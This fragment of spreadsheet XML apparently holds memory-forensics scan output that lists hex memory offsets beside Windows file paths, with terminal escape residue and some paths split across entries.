    <t>\Windows\System32\en-US\cryptext.dll.mui_x001B_[0K</t>
  </si>
  <si>
    <t>0xdea5b5f0</t>
  </si>
  <si>
    <t>57G</t>
  </si>
  <si>
    <t>0xdea5bb30</t>
  </si>
  <si>
    <t>0xdea5bdf8</t>
  </si>
  <si>
    <t>0xdea5bf18</t>
  </si>
  <si>
    <t>0xdea5c038</t>
  </si>
  <si>
    <t>0xdea5c3b8</t>
  </si>
  <si>
    <t>0xdea5c868</t>
  </si>
  <si>
    <t>0xdea5cb98</t>
  </si>
  <si>
    <t>0xdea5cc50</t>
  </si>
  <si>
    <t>0xdea5d9b0</t>
  </si>
  <si>
    <t>0xdea5dad0</t>
  </si>
  <si>
    <t>0xdea5de00</t>
  </si>
  <si>
    <t>0xdea5deb8</t>
  </si>
  <si>
    <t>0xdea5e0e0</t>
  </si>
  <si>
    <t>0xdea5e3a8</t>
  </si>
  <si>
    <t>0xdea5e4c8</t>
  </si>
  <si>
    <t>0xdea5e8b0</t>
  </si>
  <si>
    <t>0xdea5eb30</t>
  </si>
  <si>
    <t>0xdea5ee60</t>
  </si>
  <si>
    <t>0xdea5ef18</t>
  </si>
  <si>
    <t>0xdea5f038</t>
  </si>
  <si>
    <t>0xdea5f270</t>
  </si>
  <si>
    <t>0xdea5f538</t>
  </si>
  <si>
    <t>0xdea5f658</t>
  </si>
  <si>
    <t>0xdea5fce8</t>
  </si>
  <si>
    <t>0xdea60038</t>
  </si>
  <si>
    <t>0xdea60458</t>
  </si>
  <si>
    <t>0xdea60788</t>
  </si>
  <si>
    <t>\Windows\System32\en-US\hhctrl.ocx.mui_x001B_[0K</t>
  </si>
  <si>
    <t>0xdea60840</t>
  </si>
  <si>
    <t>0xdea60b10</t>
  </si>
  <si>
    <t>0xdea60c50</t>
  </si>
  <si>
    <t>0xdea60f18</t>
  </si>
  <si>
    <t>0xdea61038</t>
  </si>
  <si>
    <t>0xdea61458</t>
  </si>
  <si>
    <t>0xdea615a0</t>
  </si>
  <si>
    <t>0xdea618d0</t>
  </si>
  <si>
    <t>\Windows\System32\en-US\rdpclip.exe.mui_x001B_[0K</t>
  </si>
  <si>
    <t>0xdea61c50</t>
  </si>
  <si>
    <t>0xdea61f18</t>
  </si>
  <si>
    <t>0xdea627b0</t>
  </si>
  <si>
    <t>0xdea62b98</t>
  </si>
  <si>
    <t>0xdea62e60</t>
  </si>
  <si>
    <t>0xdea62f80</t>
  </si>
  <si>
    <t>0xdea63630</t>
  </si>
  <si>
    <t>\ProgramData\Microsoft\Windows\Start Menu\Programs\Administrative Tools\Windows Firewall with</t>
  </si>
  <si>
    <t>Advanced Secu</t>
  </si>
  <si>
    <t>rity.lnk_x001B_[0</t>
  </si>
  <si>
    <t>0xdea63950</t>
  </si>
  <si>
    <t>\Users\Support\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Wi</t>
  </si>
  <si>
    <t>ndows Explore</t>
  </si>
  <si>
    <t>r.lnk_x001B_[0K</t>
  </si>
  <si>
    <t>0xdea63b10</t>
  </si>
  <si>
    <t>\Users\Support\AppData\Roaming\Microsoft\Windows\Recent\desktop.ini_x001B_[0K</t>
  </si>
  <si>
    <t>0xdea63be8</t>
  </si>
  <si>
    <t>\Windows\System32\shlwapi.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xdea63d98</t>
  </si>
  <si>
    <t>\Windows\System32\NetProjW.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xdea64038</t>
  </si>
  <si>
    <t>0xdea64360</t>
  </si>
  <si>
    <t>0xdea64480</t>
  </si>
  <si>
    <t>0xdea64868</t>
  </si>
  <si>
    <t>0xdea64c50</t>
  </si>
  <si>
    <t>0xdea64f18</t>
  </si>
  <si>
    <t>0xdea65038</t>
  </si>
  <si>
    <t>0xdea65480</t>
  </si>
  <si>
    <t>0xdea65748</t>
  </si>
  <si>
    <t>0xdea65868</t>
  </si>
  <si>
    <t>0xdea65c50</t>
  </si>
  <si>
    <t>0xdea66038</t>
  </si>
  <si>
    <t>0xdea66480</t>
  </si>
  <si>
    <t>0xdea667b0</t>
  </si>
  <si>
    <t>\Program Files\Common Files\System\wab32res.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xdea66868</t>
  </si>
  <si>
    <t>0xdea66b30</t>
  </si>
  <si>
    <t>0xdea66c50</t>
  </si>
  <si>
    <t>0xdea67038</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_6_for_KB2761217~31bf3856ad364e35~x86~~6.1.1.0.mum_x001B_[0K_x001B_[100</t>
  </si>
  <si>
    <t>0xdea67338</t>
  </si>
  <si>
    <t>0xdea674e8</t>
  </si>
  <si>
    <t>0xdea67b98</t>
  </si>
  <si>
    <t>0xdea67e60</t>
  </si>
  <si>
    <t>0xdea67f80</t>
  </si>
  <si>
    <t>0xdea68038</t>
  </si>
  <si>
    <t>0xdea68480</t>
  </si>
  <si>
    <t>0xdea687b0</t>
  </si>
  <si>
    <t>\Windows\ServiceProfiles\LocalService\AppData\Local\~FontCache-S-1-5-21-3583694148-1414552638-</t>
  </si>
  <si>
    <t>2922671848-10</t>
  </si>
  <si>
    <t>04.dat_x001B_[0K</t>
  </si>
  <si>
    <t>0xdea68868</t>
  </si>
  <si>
    <t>0xdea68b30</t>
  </si>
  <si>
    <t>0xdea68c50</t>
  </si>
  <si>
    <t>0xdea69038</t>
  </si>
  <si>
    <t>0xdea693c8</t>
  </si>
  <si>
    <t>\Windows\System32\WFSR.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xdea69480</t>
  </si>
  <si>
    <t>0xdea69748</t>
  </si>
  <si>
    <t>0xdea69868</t>
  </si>
  <si>
    <t>0xdea69b98</t>
  </si>
  <si>
    <t>\Windows\System32\NlsLexicons0416.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xdea69c50</t>
  </si>
  <si>
    <t>0xdea69f18</t>
  </si>
  <si>
    <t>0xdea6a038</t>
  </si>
  <si>
    <t>0xdea6a480</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_30_for_KB2973351~31bf3856ad364e35~x86~~6.1.1.1.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xdea6a868</t>
  </si>
  <si>
    <t>0xdea6ab30</t>
  </si>
  <si>
    <t>0xdea6ac50</t>
  </si>
  <si>
    <t>0xdea6b038</t>
  </si>
  <si>
    <t>0xdea6b360</t>
  </si>
  <si>
    <t>0xdea6b480</t>
  </si>
  <si>
    <t>0xdea6b868</t>
  </si>
  <si>
    <t>0xdea6bc50</t>
  </si>
  <si>
    <t>0xdea6bf18</t>
  </si>
  <si>
    <t>0xdea6c038</t>
  </si>
  <si>
    <t>0xdea6c480</t>
  </si>
  <si>
    <t>0xdea6c748</t>
  </si>
  <si>
    <t>0xdea6c868</t>
  </si>
  <si>
    <t>0xdea6cc50</t>
  </si>
  <si>
    <t>0xdea6d038</t>
  </si>
  <si>
    <t>0xdea6d330</t>
  </si>
  <si>
    <t>0xdea6d7b0</t>
  </si>
  <si>
    <t>0xdea6da78</t>
  </si>
  <si>
    <t>0xdea6db98</t>
  </si>
  <si>
    <t>0xdea6df80</t>
  </si>
  <si>
    <t>0xdea6e038</t>
  </si>
  <si>
    <t>0xdea6e480</t>
  </si>
  <si>
    <t>0xdea6e768</t>
  </si>
  <si>
    <t>\Windows\System32\rdpclip.exe_x001B_[0K</t>
  </si>
  <si>
    <t>0xdea6e868</t>
  </si>
  <si>
    <t>0xdea6eb30</t>
  </si>
  <si>
    <t>0xdea6ec50</t>
  </si>
  <si>
    <t>0xdea6f038</t>
  </si>
  <si>
    <t>0xdea6f360</t>
  </si>
  <si>
    <t>0xdea6f480</t>
  </si>
  <si>
    <t>0xdea6f868</t>
  </si>
  <si>
    <t>0xdea6fc50</t>
  </si>
  <si>
    <t>0xdea6ff18</t>
  </si>
  <si>
    <t>0xdea70038</t>
  </si>
  <si>
    <t>0xdea70480</t>
  </si>
  <si>
    <t>0xdea70748</t>
  </si>
  <si>
    <t>0xdea70868</t>
  </si>
  <si>
    <t>0xdea70c50</t>
  </si>
  <si>
    <t>0xdea70ee8</t>
  </si>
  <si>
    <t>0xdea71038</t>
  </si>
  <si>
    <t>0xdea71458</t>
  </si>
  <si>
    <t>0xdea715a0</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_8_for_KB2729094~31bf3856ad364e35~x86~~6.1.2.0.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xdea71868</t>
  </si>
  <si>
    <t>0xdea71b30</t>
  </si>
  <si>
    <t>0xdea71c50</t>
  </si>
  <si>
    <t>0xdea72038</t>
  </si>
  <si>
    <t>0xdea723c8</t>
  </si>
  <si>
    <t>0xdea72480</t>
  </si>
  <si>
    <t>0xdea72868</t>
  </si>
  <si>
    <t>0xdea72b98</t>
  </si>
  <si>
    <t>\Users\Wilfred\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\8890A77645B73478F5B1DED18A</t>
  </si>
  <si>
    <t>CBF795_B95A58</t>
  </si>
  <si>
    <t>5585762F8B2</t>
  </si>
  <si>
    <t>D72E15</t>
  </si>
  <si>
    <t>2F328449A_x001B_[0K_x001B_[102G</t>
  </si>
  <si>
    <t>0xdea72c50</t>
  </si>
  <si>
    <t>0xdea72f18</t>
  </si>
  <si>
    <t>0xdea73038</t>
  </si>
  <si>
    <t>0xdea737b0</t>
  </si>
  <si>
    <t>0xdea73b98</t>
  </si>
  <si>
    <t>0xdea73f80</t>
  </si>
  <si>
    <t>0xdea74038</t>
  </si>
  <si>
    <t>0xdea74480</t>
  </si>
  <si>
    <t>0xdea74868</t>
  </si>
  <si>
    <t>0xdea74b30</t>
  </si>
  <si>
    <t>0xdea74c50</t>
  </si>
  <si>
    <t>0xdea75038</t>
  </si>
  <si>
    <t>0xdea75360</t>
  </si>
  <si>
    <t>0xdea75480</t>
  </si>
  <si>
    <t>0xdea75868</t>
  </si>
  <si>
    <t>0xdea75b98</t>
  </si>
  <si>
    <t>\Windows\System32\SearchFolder.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xdea75c50</t>
  </si>
  <si>
    <t>0xdea75f18</t>
  </si>
  <si>
    <t>0xdea76038</t>
  </si>
  <si>
    <t>0xdea76480</t>
  </si>
  <si>
    <t>0xdea76748</t>
  </si>
  <si>
    <t>0xdea76868</t>
  </si>
  <si>
    <t>0xdea76c50</t>
  </si>
  <si>
    <t>0xdea76f80</t>
  </si>
  <si>
    <t>\Windows\System32\hcproviders.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xdea77038</t>
  </si>
  <si>
    <t>0xdea773a0</t>
  </si>
  <si>
    <t>0xdea77458</t>
  </si>
  <si>
    <t>0xdea775a0</t>
  </si>
  <si>
    <t>0xdea77890</t>
  </si>
  <si>
    <t>0xdea77b30</t>
  </si>
  <si>
    <t>0xdea77c50</t>
  </si>
  <si>
    <t>0xdea783c8</t>
  </si>
  <si>
    <t>0xdea787b0</t>
  </si>
  <si>
    <t>0xdea78a78</t>
  </si>
  <si>
    <t>0xdea78b98</t>
  </si>
  <si>
    <t>0xdea78f80</t>
  </si>
  <si>
    <t>0xdea792a8</t>
  </si>
  <si>
    <t>0xdea793c8</t>
  </si>
  <si>
    <t>0xdea797b0</t>
  </si>
  <si>
    <t>0xdea79b98</t>
  </si>
  <si>
    <t>0xdea79e60</t>
  </si>
  <si>
    <t>0xdea79f80</t>
  </si>
  <si>
    <t>0xdea7a218</t>
  </si>
  <si>
    <t>0xdea7a338</t>
  </si>
  <si>
    <t>0xdea7a720</t>
  </si>
  <si>
    <t>0xdea7a868</t>
  </si>
  <si>
    <t>0xdea7af18</t>
  </si>
  <si>
    <t>0xdea7b1e0</t>
  </si>
  <si>
    <t>0xdea7b298</t>
  </si>
  <si>
    <t>0xdea7b628</t>
  </si>
  <si>
    <t>0xdea7b748</t>
  </si>
  <si>
    <t>0xdea7bb30</t>
  </si>
  <si>
    <t>0xdea7bde0</t>
  </si>
  <si>
    <t>\Vboxsvr\d_drive\Imager_Lite_3.1.1\boost_thread-vc100-mt-1_49.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xdea7bf18</t>
  </si>
  <si>
    <t>0xdea7c038</t>
  </si>
  <si>
    <t>0xdea7c4a8</t>
  </si>
  <si>
    <t>\Windows\System32\puiapi.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xdea7c5e8</t>
  </si>
  <si>
    <t>0xdea7c8b0</t>
  </si>
  <si>
    <t>0xdea7c9d0</t>
  </si>
  <si>
    <t>0xdea7cdb8</t>
  </si>
  <si>
    <t>0xdea7d1e0</t>
  </si>
  <si>
    <t>0xdea7d298</t>
  </si>
  <si>
    <t>0xdea7d680</t>
  </si>
  <si>
    <t>0xdea7d948</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_for_KB3107998_SP1~31bf3856ad364e35~x86~~6.1.1.2.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xdea7da68</t>
  </si>
  <si>
    <t>0xdea7de50</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_for_KB2705219_RTM~31bf3856ad364e35~x86~~6.1.2.0.mum_x001B_[0K_x001B_[1</t>
  </si>
  <si>
    <t>02G</t>
  </si>
  <si>
    <t>0xdea7e1d0</t>
  </si>
  <si>
    <t>0xdea7e5b8</t>
  </si>
  <si>
    <t>0xdea7e880</t>
  </si>
  <si>
    <t>0xdea7e9a0</t>
  </si>
  <si>
    <t>0xdea7ed88</t>
  </si>
  <si>
    <t>0xdea7f300</t>
  </si>
  <si>
    <t>0xdea7f6e8</t>
  </si>
  <si>
    <t>0xdea7fad0</t>
  </si>
  <si>
    <t>0xdea7fd98</t>
  </si>
  <si>
    <t>0xdea7feb8</t>
  </si>
  <si>
    <t>0xdea80298</t>
  </si>
  <si>
    <t>0xdea80680</t>
  </si>
  <si>
    <t>0xdea80a68</t>
  </si>
  <si>
    <t>0xdea80d30</t>
  </si>
  <si>
    <t>0xdea80e50</t>
  </si>
  <si>
    <t>0xdea81298</t>
  </si>
  <si>
    <t>0xdea81680</t>
  </si>
  <si>
    <t>0xdea81a68</t>
  </si>
  <si>
    <t>0xdea81d30</t>
  </si>
  <si>
    <t>0xdea81e50</t>
  </si>
  <si>
    <t>0xdea820f8</t>
  </si>
  <si>
    <t>0xdea821d0</t>
  </si>
  <si>
    <t>0xdea825b8</t>
  </si>
  <si>
    <t>0xdea829a0</t>
  </si>
  <si>
    <t>0xdea82c68</t>
  </si>
  <si>
    <t>0xdea82d88</t>
  </si>
  <si>
    <t>0xdea83148</t>
  </si>
  <si>
    <t>0xdea83200</t>
  </si>
  <si>
    <t>0xdea835e8</t>
  </si>
  <si>
    <t>0xdea838b0</t>
  </si>
  <si>
    <t>0xdea839d0</t>
  </si>
  <si>
    <t>0xdea83db8</t>
  </si>
  <si>
    <t>0xdea84038</t>
  </si>
  <si>
    <t>\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows Powe</t>
  </si>
  <si>
    <t>rShell.lnk_x001B_[0</t>
  </si>
  <si>
    <t>0xdea840f0</t>
  </si>
  <si>
    <t>\ProgramData\Microsoft\Windows\Start Menu\Programs\Administrative Tools\Component Services.lnk</t>
  </si>
  <si>
    <t>0xdea84560</t>
  </si>
  <si>
    <t>0xdea846d8</t>
  </si>
  <si>
    <t>0xdea84970</t>
  </si>
  <si>
    <t>\ProgramData\Microsoft\Windows\Start Menu\Programs\OpenSSH for Windows\Remove OpenSSH for Wind</t>
  </si>
  <si>
    <t>ows.lnk_x001B_[0K</t>
  </si>
  <si>
    <t>0xdea84cf0</t>
  </si>
  <si>
    <t>0xdea85038</t>
  </si>
  <si>
    <t>0xdea853f8</t>
  </si>
  <si>
    <t>0xdea857e0</t>
  </si>
  <si>
    <t>0xdea85a20</t>
  </si>
  <si>
    <t>0xdea85f18</t>
  </si>
  <si>
    <t>0xdea862a8</t>
  </si>
  <si>
    <t>0xdea863c8</t>
  </si>
  <si>
    <t>0xdea867b0</t>
  </si>
  <si>
    <t>0xdea86ae0</t>
  </si>
  <si>
    <t>\Windows\System32\wercplsupport.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xdea86b98</t>
  </si>
  <si>
    <t>0xdea86e60</t>
  </si>
  <si>
    <t>0xdea86f80</t>
  </si>
  <si>
    <t>0xdea87248</t>
  </si>
  <si>
    <t>\Windows\Media\Windows Logoff Sound.wav_x001B_[0K</t>
  </si>
  <si>
    <t>0xdea87300</t>
  </si>
  <si>
    <t>0xdea875c8</t>
  </si>
  <si>
    <t>0xdea876e8</t>
  </si>
  <si>
    <t>0xdea87b98</t>
  </si>
  <si>
    <t>0xdea87ec8</t>
  </si>
  <si>
    <t>0xdea87f80</t>
  </si>
  <si>
    <t>0xdea88240</t>
  </si>
  <si>
    <t>0xdea88360</t>
  </si>
  <si>
    <t>0xdea88748</t>
  </si>
  <si>
    <t>0xdea88a10</t>
  </si>
  <si>
    <t>0xdea88b30</t>
  </si>
  <si>
    <t>0xdea88f18</t>
  </si>
  <si>
    <t>0xdea891d0</t>
  </si>
  <si>
    <t>0xdea895b8</t>
  </si>
  <si>
    <t>0xdea89a68</t>
  </si>
  <si>
    <t>0xdea89e50</t>
  </si>
  <si>
    <t>0xdea8a270</t>
  </si>
  <si>
    <t>K_x001B_[103G</t>
  </si>
  <si>
    <t>0xdea8a5a0</t>
  </si>
  <si>
    <t>\Program Files\DVD Maker\DVDMaker.exe_x001B_[0K</t>
  </si>
  <si>
    <t>0xdea8a658</t>
  </si>
  <si>
    <t>0xdea8a920</t>
  </si>
  <si>
    <t>0xdea8aa40</t>
  </si>
  <si>
    <t>0xdea8ac20</t>
  </si>
  <si>
    <t>0xdea8aeb8</t>
  </si>
  <si>
    <t>\Windows\System32\en-US\TSTheme.exe.mui_x001B_[0K</t>
  </si>
  <si>
    <t>0xdea8b360</t>
  </si>
  <si>
    <t>0xdea8b690</t>
  </si>
  <si>
    <t>\Windows\System32\mydocs.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xdea8b748</t>
  </si>
  <si>
    <t>0xdea8ba10</t>
  </si>
  <si>
    <t>0xdea8bb30</t>
  </si>
  <si>
    <t>0xdea8bf18</t>
  </si>
  <si>
    <t>0xdea8c150</t>
  </si>
  <si>
    <t>0xdea8c270</t>
  </si>
  <si>
    <t>0xdea8c668</t>
  </si>
  <si>
    <t>0xdea8c720</t>
  </si>
  <si>
    <t>0xdea8c8b0</t>
  </si>
  <si>
    <t>0xdea8cdf8</t>
  </si>
  <si>
    <t>0xdea8cf18</t>
  </si>
  <si>
    <t>0xdea8d038</t>
  </si>
  <si>
    <t>\Windows\System32\dwmcore.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xdea8d200</t>
  </si>
  <si>
    <t>0xdea8d5e8</t>
  </si>
  <si>
    <t>0xdea8d918</t>
  </si>
  <si>
    <t>\Windows\System32\TSTheme.exe_x001B_[0K</t>
  </si>
  <si>
    <t>0xdea8d9d0</t>
  </si>
  <si>
    <t>0xdea8ddb8</t>
  </si>
  <si>
    <t>0xdea8e258</t>
  </si>
  <si>
    <t>0xdea8e588</t>
  </si>
  <si>
    <t>\Users\Support\AppData\Local\Microsoft\Windows\History\desktop.ini_x001B_[0K</t>
  </si>
  <si>
    <t>0xdea8e640</t>
  </si>
  <si>
    <t>0xdea8e908</t>
  </si>
  <si>
    <t>0xdea8ea28</t>
  </si>
  <si>
    <t>0xdea8ece8</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Microsoft-Windows-InternetExplorer-Package~31bf3856ad364e35~x86~~1</t>
  </si>
  <si>
    <t>1.2.9600.1642</t>
  </si>
  <si>
    <t>8.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xdea8f1d0</t>
  </si>
  <si>
    <t>0xdea8f5b8</t>
  </si>
  <si>
    <t>0xdea8f9b0</t>
  </si>
  <si>
    <t>\Vboxsvr\d_drive\Imager_Lite_3.1.1\boost_regex-vc100-mt-1_49.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xdea8fa68</t>
  </si>
  <si>
    <t>0xdea8fd30</t>
  </si>
  <si>
    <t>0xdea8fe50</t>
  </si>
  <si>
    <t>0xdea900e8</t>
  </si>
  <si>
    <t>0xdea90300</t>
  </si>
  <si>
    <t>0xdea905c8</t>
  </si>
  <si>
    <t>0xdea906e8</t>
  </si>
  <si>
    <t>0xdea90ad0</t>
  </si>
  <si>
    <t>0xdea90eb8</t>
  </si>
  <si>
    <t>0xdea91038</t>
  </si>
  <si>
    <t>\Windows\System32\cscapi.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xdea91270</t>
  </si>
  <si>
    <t>0xdea91658</t>
  </si>
  <si>
    <t>0xdea91900</t>
  </si>
  <si>
    <t>0xdea91f18</t>
  </si>
  <si>
    <t>0xdea92298</t>
  </si>
  <si>
    <t>0xdea92680</t>
  </si>
  <si>
    <t>0xdea92a68</t>
  </si>
  <si>
    <t>0xdea92d30</t>
  </si>
  <si>
    <t>0xdea92e50</t>
  </si>
  <si>
    <t>0xdea931d0</t>
  </si>
  <si>
    <t>0xdea935b8</t>
  </si>
  <si>
    <t>0xdea939b0</t>
  </si>
  <si>
    <t>0xdea93a68</t>
  </si>
  <si>
    <t>0xdea93d98</t>
  </si>
  <si>
    <t>70}\offreg.26</t>
  </si>
  <si>
    <t>04.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xdea93e50</t>
  </si>
  <si>
    <t>0xdea94148</t>
  </si>
  <si>
    <t>0xdea94200</t>
  </si>
  <si>
    <t>0xdea945e8</t>
  </si>
  <si>
    <t>0xdea949d0</t>
  </si>
  <si>
    <t>0xdea94c98</t>
  </si>
  <si>
    <t>0xdea94db8</t>
  </si>
  <si>
    <t>0xdea954f8</t>
  </si>
  <si>
    <t>0xdea957a0</t>
  </si>
  <si>
    <t>0xdea95d00</t>
  </si>
  <si>
    <t>0xdea95db8</t>
  </si>
  <si>
    <t>0xdea96038</t>
  </si>
  <si>
    <t>0xdea96480</t>
  </si>
  <si>
    <t>0xdea96868</t>
  </si>
  <si>
    <t>0xdea96b00</t>
  </si>
  <si>
    <t>0xdea96c50</t>
  </si>
  <si>
    <t>0xdea96f80</t>
  </si>
  <si>
    <t>\Program Files\Common Files\microsoft shared\ink\tiptsf.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xdea97038</t>
  </si>
  <si>
    <t>0xdea973b8</t>
  </si>
  <si>
    <t>0xdea97868</t>
  </si>
  <si>
    <t>0xdea97b98</t>
  </si>
  <si>
    <t>0xdea97c50</t>
  </si>
  <si>
    <t>0xdea97f18</t>
  </si>
  <si>
    <t>0xdea98198</t>
  </si>
  <si>
    <t>0xdea98430</t>
  </si>
  <si>
    <t>\ProgramData\Microsoft\Windows\Start Menu\Programs\Administrative Tools\System Configuration.l</t>
  </si>
  <si>
    <t>nk_x001B_[0K</t>
  </si>
  <si>
    <t>0xdea986f8</t>
  </si>
  <si>
    <t>0xdea987b0</t>
  </si>
  <si>
    <t>0xdea98b98</t>
  </si>
  <si>
    <t>0xdea98e50</t>
  </si>
  <si>
    <t>0xdea98f80</t>
  </si>
  <si>
    <t>0xdea99310</t>
  </si>
  <si>
    <t>0xdea993c8</t>
  </si>
  <si>
    <t>0xdea996f8</t>
  </si>
  <si>
    <t>0xdea997b0</t>
  </si>
  <si>
    <t>0xdea99ae0</t>
  </si>
  <si>
    <t>0xdea99b98</t>
  </si>
  <si>
    <t>0xdea99f80</t>
  </si>
  <si>
    <t>0xdea9a220</t>
  </si>
  <si>
    <t>\Windows\System32\msftedit.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xdea9a2d8</t>
  </si>
  <si>
    <t>0xdea9a608</t>
  </si>
  <si>
    <t>0xdea9a6c0</t>
  </si>
  <si>
    <t>0xdea9a968</t>
  </si>
  <si>
    <t>0xdea9af80</t>
  </si>
  <si>
    <t>0xdea9b360</t>
  </si>
  <si>
    <t>0xdea9b690</t>
  </si>
  <si>
    <t>0xdea9b748</t>
  </si>
  <si>
    <t>0xdea9bb30</t>
  </si>
  <si>
    <t>0xdea9be60</t>
  </si>
  <si>
    <t>0xdea9bf18</t>
  </si>
  <si>
    <t>0xdea9c1e0</t>
  </si>
  <si>
    <t>0xdea9c298</t>
  </si>
  <si>
    <t>0xdea9c680</t>
  </si>
  <si>
    <t>0xdea9cb30</t>
  </si>
  <si>
    <t>0xdea9ce60</t>
  </si>
  <si>
    <t>0xdea9cf18</t>
  </si>
  <si>
    <t>0xdea9d480</t>
  </si>
  <si>
    <t>0xdea9d868</t>
  </si>
  <si>
    <t>0xdea9de50</t>
  </si>
  <si>
    <t>0xdea9e250</t>
  </si>
  <si>
    <t>\Users\Support\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\System Tools\</t>
  </si>
  <si>
    <t>Desktop.ini_x001B_[</t>
  </si>
  <si>
    <t>0xdea9e408</t>
  </si>
  <si>
    <t>0xdea9ec00</t>
  </si>
  <si>
    <t>0xdea9ee20</t>
  </si>
  <si>
    <t>\Windows\System32\winevt\Logs\Microsoft-Windows-CodeIntegrity%4Operational.evtx_x001B_[0K</t>
  </si>
  <si>
    <t>0xdea9ef80</t>
  </si>
  <si>
    <t>0xdea9f300</t>
  </si>
  <si>
    <t>0xdea9f6e8</t>
  </si>
  <si>
    <t>0xdea9fad0</t>
  </si>
  <si>
    <t>0xdea9feb8</t>
  </si>
  <si>
    <t>0xdeaa0360</t>
  </si>
  <si>
    <t>0xdeaa0748</t>
  </si>
  <si>
    <t>0xdeaa0b30</t>
  </si>
  <si>
    <t>0xdeaa0e60</t>
  </si>
  <si>
    <t>\Users\Wilfred\Desktop_x001B_[0K</t>
  </si>
  <si>
    <t>0xdeaa0f18</t>
  </si>
  <si>
    <t>0xdeaa1270</t>
  </si>
  <si>
    <t>0xdeaa1658</t>
  </si>
  <si>
    <t>0xdeaa1a40</t>
  </si>
  <si>
    <t>0xdeaa2298</t>
  </si>
  <si>
    <t>0xdeaa2680</t>
  </si>
  <si>
    <t>0xdeaa2a68</t>
  </si>
  <si>
    <t>0xdeaa2e50</t>
  </si>
  <si>
    <t>0xdeaa3270</t>
  </si>
  <si>
    <t>0xdeaa35a0</t>
  </si>
  <si>
    <t>\ProgramData\Microsoft\Windows Defender\Scans\History\Results\Resource\{21B946A5-D501-490E-856</t>
  </si>
  <si>
    <t>E-0BFB95B7F8F</t>
  </si>
  <si>
    <t>0xdeaa3658</t>
  </si>
  <si>
    <t>0xdeaa3e50</t>
  </si>
  <si>
    <t>0xdeaa41e0</t>
  </si>
  <si>
    <t>\Users\Support\AppData\Roaming\Microsoft\Windows\SendTo\Desktop.ini_x001B_[0K</t>
  </si>
  <si>
    <t>0xdeaa4298</t>
  </si>
  <si>
    <t>0xdeaa4680</t>
  </si>
  <si>
    <t>0xdeaa4a68</t>
  </si>
  <si>
    <t>0xdeaa4e50</t>
  </si>
  <si>
    <t>0xdeaa5270</t>
  </si>
  <si>
    <t>0xdeaa5a68</t>
  </si>
  <si>
    <t>0xdeaa5d98</t>
  </si>
  <si>
    <t>\Windows\System32\WcnApi.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xdeaa5e50</t>
  </si>
  <si>
    <t>0xdeaa6298</t>
  </si>
  <si>
    <t>0xdeaa6680</t>
  </si>
  <si>
    <t>0xdeaa6a68</t>
  </si>
  <si>
    <t>0xdeaa6d98</t>
  </si>
  <si>
    <t>\Windows\System32\xwizards.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xdeaa6e50</t>
  </si>
  <si>
    <t>0xdeaa7298</t>
  </si>
  <si>
    <t>0xdeaa7680</t>
  </si>
  <si>
    <t>0xdeaa7a68</t>
  </si>
  <si>
    <t>0xdeaa7e50</t>
  </si>
  <si>
    <t>0xdeaa80e8</t>
  </si>
  <si>
    <t>\Windows\System32\userinit.exe_x001B_[0K</t>
  </si>
  <si>
    <t>0xdeaa8298</t>
  </si>
  <si>
    <t>0xdeaa8680</t>
  </si>
  <si>
    <t>0xdeaa8a68</t>
  </si>
  <si>
    <t>0xdeaa8e50</t>
  </si>
  <si>
    <t>0xdeaa9298</t>
  </si>
  <si>
    <t>0xdeaa9680</t>
  </si>
  <si>
    <t>0xdeaa9a68</t>
  </si>
  <si>
    <t>0xdeaa9e50</t>
  </si>
  <si>
    <t>0xdeaaa298</t>
  </si>
  <si>
    <t>0xdeaaa680</t>
  </si>
  <si>
    <t>0xdeaaaa68</t>
  </si>
  <si>
    <t>0xdeaaae50</t>
  </si>
  <si>
    <t>0xdeaab270</t>
  </si>
  <si>
    <t>0xdeaab658</t>
  </si>
  <si>
    <t>0xdeaabe50</t>
  </si>
  <si>
    <t>0xdeaac0d0</t>
  </si>
  <si>
    <t>0xdeaac298</t>
  </si>
  <si>
    <t>0xdeaac680</t>
  </si>
  <si>
    <t>0xdeaaca68</t>
  </si>
  <si>
    <t>0xdeaace50</t>
  </si>
  <si>
    <t>0xdeaad298</t>
  </si>
  <si>
    <t>0xdeaad5c8</t>
  </si>
  <si>
    <t>\Users\Wilfred\AppData\Local\Microsoft\Windows\Explorer\thumbcache_idx.db_x001B_[0K</t>
  </si>
  <si>
    <t>0xdeaad680</t>
  </si>
  <si>
    <t>0xdeaad9b0</t>
  </si>
  <si>
    <t>\Vboxsvr\d_drive\Imager_Lite_3.1.1\LMS.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xdeaada68</t>
  </si>
  <si>
    <t>0xdeaade50</t>
  </si>
  <si>
    <t>0xdeaae298</t>
  </si>
  <si>
    <t>0xdeaae5c8</t>
  </si>
  <si>
